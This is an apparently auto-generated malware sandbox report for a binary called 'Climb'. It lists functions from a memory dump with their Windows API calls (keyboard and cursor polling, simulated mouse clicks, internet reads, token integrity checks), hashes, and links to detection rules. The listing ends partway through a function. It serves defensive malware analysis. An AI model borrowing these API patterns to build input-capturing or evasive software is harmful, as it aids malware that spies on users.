Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 7cf673438a57872e8574bd7d6741e9d20e548d7985491851e5d8fb8f824add7a
Instruction ID: 4de63a3925a41a30bee5f96aa615333afc8684d6c47a6df3264f16df024c170f
Opcode Fuzzy Hash: 7cf673438a57872e8574bd7d6741e9d20e548d7985491851e5d8fb8f824add7a
Instruction Fuzzy Hash: 3741D172A00204AFDB24DF79C881A9DB3F9EF89314F1585A9E615EB392D731ED41CB90

Function 000B19CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 000B19E1
ScreenToClient.USER32(00000000,?), ref: 000B19FE
GetAsyncKeyState.USER32(00000001), ref: 000B1A23
GetAsyncKeyState.USER32(00000002), ref: 000B1A3D

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 76b0f973c849ee09f0f6d41aa02956d9ed5ddb19718216bb0a333cac4b89636c
Instruction ID: 19ca0259e73b6cf4ad1ec097656d3e8a0c35c01592fb4020d6c5e4b8220ca0ee
Opcode Fuzzy Hash: 76b0f973c849ee09f0f6d41aa02956d9ed5ddb19718216bb0a333cac4b89636c
Instruction Fuzzy Hash: AA414B75A0410AFFDF159F64C854AFEB7B4FB05324F20821AE469A62A0C7346A94DB92

Function 001242B9 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00124310
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00124367
TranslateMessage.USER32(?), ref: 00124390
DispatchMessageW.USER32(?), ref: 0012439A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001243AB

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 4ac8af6182d82795ec332a45f260a74d3a83b11d686872db7af00a20e0579ac9
Instruction ID: 44b43f17c73d26b7a613e238dabc5cdc4afa850f9ebfefae60f699e9575edc5e
Opcode Fuzzy Hash: 4ac8af6182d82795ec332a45f260a74d3a83b11d686872db7af00a20e0579ac9
Instruction Fuzzy Hash: 1E31B770904375DFEB39DB74F849BB63BA8BB01308F040569E4A2C25A0E7B499A5CB11

Function 0011224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00112262
PostMessageW.USER32(00000001,00000201,00000001), ref: 0011230E
Sleep.KERNEL32(00000000,?,?,?), ref: 00112316
PostMessageW.USER32(00000001,00000202,00000000), ref: 00112327
Sleep.KERNEL32(00000000,?,?,?,?), ref: 0011232F

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 55ba56f8f2d0351ec15748859b899e57574a3cadbb40716c3e9d522ff2863ee5
Instruction ID: d0b9f798776f8d0fd400f391d41cfdc74fc39b2f8a4df89948a8647cbd7c85c5
Opcode Fuzzy Hash: 55ba56f8f2d0351ec15748859b899e57574a3cadbb40716c3e9d522ff2863ee5
Instruction Fuzzy Hash: 3231E271900219EFDF08CFA8DD88ADE3BB5FB05315F004225F925A72E0C3709990CB90

Function 0012D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0012CC63,00000000), ref: 0012D97D
InternetReadFile.WININET(?,00000000,?,?), ref: 0012D9B4
GetLastError.KERNEL32(?,00000000,?,?,?,0012CC63,00000000), ref: 0012D9F9
SetEvent.KERNEL32(?,?,00000000,?,?,?,0012CC63,00000000), ref: 0012DA0D
SetEvent.KERNEL32(?,?,00000000,?,?,?,0012CC63,00000000), ref: 0012DA37

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 1d5588f73517a6010fae2b41e16b676413f8c213b7c62c9d518a8adf86bc2e19
Instruction ID: 582562b87a1bd8acc6c8f1922ede049d7ffb765f35d17f1faeabe910ac8d1e58
Opcode Fuzzy Hash: 1d5588f73517a6010fae2b41e16b676413f8c213b7c62c9d518a8adf86bc2e19
Instruction Fuzzy Hash: 64314971A04215EFDF24DFA5F884EAABBF8EB04358B10442EF546D3250DB70EE909B60

Function 001461A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 001461E4
SendMessageW.USER32(?,00001074,?,00000001), ref: 0014623C
_wcslen.LIBCMT ref: 0014624E
_wcslen.LIBCMT ref: 00146259
SendMessageW.USER32(?,00001002,00000000,?), ref: 001462B5

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: ca372eb3e046a55463c6ee31e3bd0db8819c30ed51855302f7e4e2c5e6e2d623
Instruction ID: e56453d494e3e8867d1c4ccf362c10ecb49eac8a7f0e7553d0813d3cd2eda6dc
Opcode Fuzzy Hash: ca372eb3e046a55463c6ee31e3bd0db8819c30ed51855302f7e4e2c5e6e2d623
Instruction Fuzzy Hash: B021B475900218ABDF11DFA0CC84EEE77B9FF06728F104226FA25EA1A1D7709985CF51

Function 0013138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 001313AE
GetForegroundWindow.USER32 ref: 001313C5
GetDC.USER32(00000000), ref: 00131401
GetPixel.GDI32(00000000,?,00000003), ref: 0013140D
ReleaseDC.USER32(00000000,00000003), ref: 00131445

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 4b804da8e90d344fa94d401db7a4658c3a3fd940a8b91f82b26f304eccfcf8f9
Instruction ID: 4ef8783f9908d473423b5b75f2e46383b8fe9d4efb1a51968875c512aab192da
Opcode Fuzzy Hash: 4b804da8e90d344fa94d401db7a4658c3a3fd940a8b91f82b26f304eccfcf8f9
Instruction Fuzzy Hash: 1A218E3A600214AFDB04EF65D888A9EB7F5EF49750B058439E84A97762CB30AC40CB90

Function 000ED13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 000ED146
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000ED169

Part of subcall function 000E3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,000D6A79,?,0000015D,?,?,?,?,000D85B0,000000FF,00000000,?,?), ref: 000E3BC5

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 000ED18F
_free.LIBCMT ref: 000ED1A2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000ED1B1

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: ce50b5ca33b9d75f2555f495b42575d918394203faef7581485a90c3213ff39d
Instruction ID: 3bfed67d91e40c8c404c0ab78df72600a9ca8e931cc98f2ac66c7231c7d7cbad
Opcode Fuzzy Hash: ce50b5ca33b9d75f2555f495b42575d918394203faef7581485a90c3213ff39d
Instruction Fuzzy Hash: DB01D4766026957F37216A7B6C8CD7F6AADEFC3FA1314016AFD04E2240DA608C0181B1

Function 00116078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 0011608D
_memcmp.LIBVCRUNTIME ref: 001160AB
_memcmp.LIBVCRUNTIME ref: 001160BE
_memcmp.LIBVCRUNTIME ref: 001160D6
_memcmp.LIBVCRUNTIME ref: 001160EE

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: d5876796bfbaef90241d95fc418e0e3953141b6af34c64d1894cdf39c8aa60a8
Instruction ID: a809d816247a9fe514a192d2292dacf85569ca09601bab0e3afa571e22732365
Opcode Fuzzy Hash: d5876796bfbaef90241d95fc418e0e3953141b6af34c64d1894cdf39c8aa60a8
Instruction Fuzzy Hash: 0801B1B2704705BBD61856249C82FEB736D9F5D399B014036FD0A9A243FB63ED94C2B1

Function 000E316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0000000A,?,?,000DF64E,000D545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 000E3170
_free.LIBCMT ref: 000E31A5
_free.LIBCMT ref: 000E31CC
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 000E31D9
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 000E31E2

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: aefe6b36409f7448eeea747b5a2dc9c786194c1448d2c9823321aec56a8854fb
Instruction ID: 1822d7eeebcf6bf7b8cc6306ce326b8e4797414832d80cfcb0853319adaa76aa
Opcode Fuzzy Hash: aefe6b36409f7448eeea747b5a2dc9c786194c1448d2c9823321aec56a8854fb
Instruction Fuzzy Hash: DA01F976645A802F96126737AC4DE6F1EADAFC1771321047CF915B3292EE22CA414111

Function 001108FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00110831,80070057,?,?,?,00110C4E), ref: 0011091B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00110831,80070057,?,?), ref: 00110936
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00110831,80070057,?,?), ref: 00110944
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00110831,80070057,?), ref: 00110954
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00110831,80070057,?,?), ref: 00110960

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 03cbe79ec36f664215feefdfa1c504bcb219ce65931485470d6b10aea85af1e9
Instruction ID: 5c1961d50577d28a3e8ce70f1bcb76ab0911675e707b89c9635674698b7756ac
Opcode Fuzzy Hash: 03cbe79ec36f664215feefdfa1c504bcb219ce65931485470d6b10aea85af1e9
Instruction Fuzzy Hash: 3E0184B6A00209AFEB154F55DC44BEA7AADEB48755F140138F909D6121E7B1DDC0D760

Function 0011F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0011F2AE
QueryPerformanceFrequency.KERNEL32(?), ref: 0011F2BC
Sleep.KERNEL32(00000000), ref: 0011F2C4
QueryPerformanceCounter.KERNEL32(?), ref: 0011F2CE
Sleep.KERNEL32 ref: 0011F30A

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 84cbed5fcb32c0827c69fbcc51c4c76f706e7f243813cb77d2fbc3f0dda1fa82
Instruction ID: 0681b1e4fc82ed6c6378dc470fa95f344fa449c3e25564bd67b6434925c62f74
Opcode Fuzzy Hash: 84cbed5fcb32c0827c69fbcc51c4c76f706e7f243813cb77d2fbc3f0dda1fa82
Instruction Fuzzy Hash: 97014C75D0161DDBCF08AFF4EC49AEEBB78FB09701F01046AE912B2660DB709595C7A1

Function 00111A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00111A60
GetLastError.KERNEL32(?,00000000,00000000,?,?,001114E7,?,?,?), ref: 00111A6C
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001114E7,?,?,?), ref: 00111A7B
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001114E7,?,?,?), ref: 00111A82
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00111A99

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 576c9e6282bfc58b4cdcea2ae43ba0c6aa79c5d845c789ca393274be95aef79d
Instruction ID: 239c03e2e53ce6e146100109b1d1ab2821148bb117ebf5f1a63f33294eb663f6
Opcode Fuzzy Hash: 576c9e6282bfc58b4cdcea2ae43ba0c6aa79c5d845c789ca393274be95aef79d
Instruction Fuzzy Hash: E00181B9601205BFDF154FA4FC48DAA3F6DEF853A4B210468F945C3260DB31DC808A60

Function 00111900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00111916
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00111922
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00111931
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00111938
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0011194E

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 9dafc353f33ee6d1f56dfcaa24deb7d331a1dc113918504396a2bf5499d678f4
Instruction ID: 3cfb36d893e03ee0873025124ce1a730f0d3b873692e734fdff40189dba326f7
Opcode Fuzzy Hash: 9dafc353f33ee6d1f56dfcaa24deb7d331a1dc113918504396a2bf5499d678f4
Instruction Fuzzy Hash: E9F06279200305BBDB210FA5EC4DF963B6DEF8A7A0F110425FA45D7260CB70DC808A60

Function 00111960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00111976
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00111982
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00111991
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00111998
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001119AE

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 6de8f4d8aaf9fb8690e206cc44f9679246a7c6363b076f91544dcab40e789732
Instruction ID: 7ca04faff43ebe3f8714967b23f5d246bf18dcfef14c17580be4004842b6be4c
Opcode Fuzzy Hash: 6de8f4d8aaf9fb8690e206cc44f9679246a7c6363b076f91544dcab40e789732
Instruction Fuzzy Hash: 17F06279200305BBDB214FA4EC59F963B6DFF8A7A0F110424FE45C7260CB70D8808A60

Function 00120CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00120B24,?,00123D41,?,00000001,000F3AF4,?), ref: 00120CCB
CloseHandle.KERNEL32(?,?,?,?,00120B24,?,00123D41,?,00000001,000F3AF4,?), ref: 00120CD8
CloseHandle.KERNEL32(?,?,?,?,00120B24,?,00123D41,?,00000001,000F3AF4,?), ref: 00120CE5
CloseHandle.KERNEL32(?,?,?,?,00120B24,?,00123D41,?,00000001,000F3AF4,?), ref: 00120CF2
CloseHandle.KERNEL32(?,?,?,?,00120B24,?,00123D41,?,00000001,000F3AF4,?), ref: 00120CFF
CloseHandle.KERNEL32(?,?,?,?,00120B24,?,00123D41,?,00000001,000F3AF4,?), ref: 00120D0C

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 9f7abaf29c2ba99b194319ef1f4f33a499001c6d2f4251a188decd1d2c50acfd
Instruction ID: 4215e7a5f75d4468a30eee30a351c2a45f323c1e5199b3f0bc1a35df8dc49f04
Opcode Fuzzy Hash: 9f7abaf29c2ba99b194319ef1f4f33a499001c6d2f4251a188decd1d2c50acfd
Instruction Fuzzy Hash: 790190B1801B259FCB31AFA6E980816F6F5BF503153158B3ED19652932C7B0A964DE80

Function 001165AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 001165BF
GetWindowTextW.USER32(00000000,?,00000100), ref: 001165D6
MessageBeep.USER32(00000000), ref: 001165EE
KillTimer.USER32(?,0000040A), ref: 0011660A
EndDialog.USER32(?,00000001), ref: 00116624

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 97c56321314204a168df5c197de3383e7a75f2764f24a8bbdac6b5ebb1ae75bd
Instruction ID: 4c7fe453b8574bd644f5f322681ce6238c438e2a5b53b39aa458b983068a7122
Opcode Fuzzy Hash: 97c56321314204a168df5c197de3383e7a75f2764f24a8bbdac6b5ebb1ae75bd
Instruction Fuzzy Hash: 6F018134500714ABEF385F20ED4EBDA7BB8FB01705F010669A586A14F1EBF1AAC4CB91

Function 000EDABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 000EDAD2

